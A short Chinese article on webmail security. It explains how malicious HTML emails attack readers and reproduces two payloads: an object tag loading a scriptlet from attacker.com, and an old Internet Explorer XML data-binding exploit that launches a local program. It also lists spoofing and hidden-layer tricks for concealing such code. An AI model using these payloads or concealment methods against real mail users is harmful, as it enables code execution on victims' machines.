Webmail攻防实战

核心提示： ＜body＞＜object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"＞＜/object＞＜/body＞攻击者还可以采取如下方法，使带有恶性代码的html邮件具有

＜body＞
＜object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"＞＜/object＞
＜/body＞

攻击者还可以采取如下方法，使带有恶性代码的html邮件具有更大的隐蔽性：

(1) 配合邮件欺骗技术，使用户不会怀疑收到的邮件，并且攻击者也能隐藏自己的行踪。

(2) 把html邮件设计成看起来像txt邮件。

(3) 有时可以把html邮件中的恶性代码放在一个隐藏的层里面，表面上看不出任何变化。

针对恶性脚本程序的影响，对用户常见的建议办法是提高浏览器的安全级别，如禁用ActiveX、禁用脚本等，但这并不是一个很好的办法，因为这样会影响到用户对其他正常html页面的浏览。即使浏览器达到了最高级别，依然对某些恶性代码无济于事，下面是位以色列安全专家发现的漏洞，能让Windows系统自动执行任何本地程序，即使Internet Explorer已经禁止了ActiveX和脚本程序：

＜span datasrc="#oExec" datafld="exploit" dataformatas="html"＞＜/span＞
　　＜xml id="oExec"＞
＜security＞
＜exploit＞
＜![CDATA[
＜object id="oFile" classid="clsid:11111111-1111-1111-1111-
111111111111" codebase="c:/winnt/system32/calc.exe"＞＜/object＞
]]＞
＜/exploit＞
＜/security＞
＜/xml＞

面对恶性html邮件，WebMail系统和用户似乎都没有很好的解决办法，虽然许多WebMail系统已经能够过滤掉html邮件中的很多恶性代码，不过令人遗憾的是，要想彻底过滤掉恶性代码并不是一件容易的事情，攻击者总能利用WebMail系统过滤机制和浏览器的漏洞找到办法绕过种种过滤，WebMail系统所能做的就是发现一个漏洞补一个漏洞。